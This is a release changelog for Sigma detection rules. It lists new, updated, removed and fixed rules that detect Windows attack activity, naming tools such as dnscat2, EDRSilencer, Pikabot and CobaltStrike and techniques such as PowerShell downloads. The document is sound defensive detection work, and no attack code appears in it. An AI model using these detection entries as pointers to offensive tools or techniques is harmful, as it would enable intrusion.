New Rules
- new: CodePage Modification Via MODE.COM
- new: CodePage Modification Via MODE.COM To Russian Language
- new: HackTool - EDRSilencer Execution - Filter Added
- new: HackTool - SharpMove Tool Execution
- new: Pikabot Fake DLL Extension Execution Via Rundll32.EXE
- new: Rare Remote Thread Creation By Uncommon Source Image - A split of 66d31e5f-52d6-40a4-9615-002d3789a119
- new: Unsigned DLL Loaded by RunDLL32/RegSvr32
Updated Rules
- update: All Rules Have Been Deleted From The Windows Firewall Configuration - Remove program files filter to increase coverage. As deleting rules shouldn't be a "normal" behavior.
- update: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Increase coverage
- update: CreateRemoteThread API and LoadLibrary - Reduce level to medium and convert to a TH rule
- update: Critical Hive In Suspicious Location Access Bits Cleared - Enhance metadata and logic
- update: Malicious PowerShell Commandlets - PoshModule - "Start-Dnscat2"
- update: Malicious PowerShell Commandlets - ProcessCreation - "Start-Dnscat2"
- update: Malicious PowerShell Commandlets - ScriptBlock - "Start-Dnscat2"
- update: Malicious PowerShell Scripts - FileCreation - Add "dnscat2.ps1"
- update: Malicious PowerShell Scripts - PoshModule - Add "dnscat2.ps1"
- update: Monitoring For Persistence Via BITS - Use "Image" and "OriginalFileName" fields instead of CLI only
- update: Network Communication With Crypto Mining Pool - new domains from
miningocean.org
- update: New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application - Add additional paths to increase coverage
- update: New Process Created Via Taskmgr.EXE - Added full paths to the filtered binaries to decrease false negatives
- update: New or Renamed User Account with '$' Character - Reduced level to "medium"
- update: Potential Dropper Script Execution Via WScript/CScript - Re-wrote the logic by removing the paths "C:\Users" and "C:\ProgramData". As these are very common and will generate high FP rate. Instead switched the paths to a more robust list and extended the list of extension covered. Also reduced the level to "medium"
- update: Potential Fake Instance Of Hxtsr.EXE Executed - Remove "C:" prefix from detection logic
- update: Potential Pikabot C2 Activity - Added "searchfilterhost.exe"
- update: Potential Pikabot Discovery Activity - Added "SearchProtocolHost.exe" and "SearchFilterHost.exe"
- update: Potential Pikabot Hollowing Activity - Added "searchfilterhost"
- update: Powershell Install a DLL in System Directory - enhance rule context in big script blocks
- update: Prefetch File Deleted - Update selection to remove 'C:' prefix
- update: Remote Thread Creation By Uncommon Source Image - Reduced level to medium and move high indicators to 02d1d718-dd13-41af-989d-ea85c7fab93f
- update: Rundll32 Execution With Uncommon DLL Extension - Enhanced FP filters
- update: Sensitive File Access Via Volume Shadow Copy Backup - Made the rule more generic by updating the title and removing the IOC from conti. (will be added in a dedicated rule)
- update: Shell Process Spawned by Java.EXE - Add "bash.exe"
- update: Suspicious PowerShell Download - Powershell Script - Add "DownloadFileAsync" and "DownloadStringAsync" functions
- update: Suspicious Processes Spawned by Java.EXE - Remove "bash.exe" as its doesn't fit the logic
- update: Sysmon Application Crashed - Add 32bit version of sysmon binary
- update: Tap Driver Installation - Security - Reduce level to "low"
- update: Write Protect For Storage Disabled - Remove "storagedevicepolicies" as the string "storage" already covers it
Removed / Deprecated Rules
- remove: Dnscat Execution - Deprecated in favour of an integration in the "Malicious PowerShell Cmdlet" type of rules
- remove: SAM Dump to AppData
Fixed Rules
- fix: CobaltStrike Named Pipe Patterns - Add Websense named pipe filter
- fix: EventLog Query Requests By Builtin Utilities - Typo in wmic process name
- fix: Firewall Rule Modified In The Windows Firewall Exception List - new optional filter Brave browser
- fix: Kerberos Manipulation - Update field to use Status instead of incorrect "FailureCode"
- fix: Metasploit SMB Authentication - Remove unnecessary field
- fix: Outbound RDP Connections Over Non-Standard Tools - new FP filter for RAS TSplus
- fix: PowerShell Core DLL Loaded By Non PowerShell Process - new optional filter for chocolatey
- fix: Remote Thread Creation In Mstsc.Exe From Suspicious Location - Fix a broken path string
- fix: Remote Thread Creation In Uncommon Target Image - Reduce level to medium and remove explorer as target due to FP rates.
- fix: Service Installation in Suspicious Folder - Update FP filter
- fix: Uncommon New Firewall Rule Added In Windows Firewall Exception List - Fix the filters to be more generic
Acknowledgement
Thanks to @CrimpSec, @frack113, @jstnk9, @nasbench, @phantinuss, @qasimqlf, @slincoln-aiq, @swachchhanda000, @t-pol, @tr0mb1r, @xiangchen96 for their contribution to this release
Which Sigma rule package should I use?
A detailed explanation can be found in the Releases.md file. If you are new to Sigma, we recommend starting with the "Core" ruleset.
The latest release package on GitHub can always be found here.